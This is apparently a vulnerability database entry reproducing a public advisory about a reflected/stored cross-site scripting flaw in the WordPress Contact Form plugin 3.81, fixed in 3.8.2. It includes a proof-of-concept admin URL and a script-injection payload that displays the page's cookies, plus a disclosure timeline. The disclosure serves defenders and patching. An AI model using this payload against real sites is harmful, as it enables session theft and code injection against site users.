WordPress Contact Form 3.81 Cross Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1040648 漏洞类型
发布时间 2015-12-17 更新时间 2015-12-17
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2015120182
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Plugin Details
 
Plugin Name : Contact Form
 
Effected Version : 3.81 (and most probably lower version's if any)
 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Madhu Akula
 

 
Technical Details
 
Minimum Level of Access Required : Unauthenticated
 
PoC - (Proof of Concept) :

http://localhost/wp-admin/admin.php?page=contactform.php&action=go_pro

In the serial key place the below payload

"><script>alert(document.cookie)</script>

Vulnerable Parameter : bws_license_key


Video Demonstration :

http://www.youtube.com/watch?v=4yHZvPs8FTE
 
Type of XSS : Reflected / Stored
 
Fixed in : 3.8.2
 
http://wordpress.org/plugins/contact-form-plugin/changelog/
 
Disclosure Timeline
 
Vendor Contacted : 2014-08-04
 
Plugin Status : Updated on 2014-08-07
 
Public Disclosure : October 3, 2015
 
CVE Number : Not assigned yet
 
Plugin Description :
 
The Contact Form plugin allows you to implement a feedback form to a web-page or a post in no time. It is an extremely easy form, that doesn?t require any additional settings, though there are some available options. All you need is just to activate the plugin and insert the shortcode [bestwebsoft_contact_form] into the text. There is also a premium version of the plugin with more useful features available.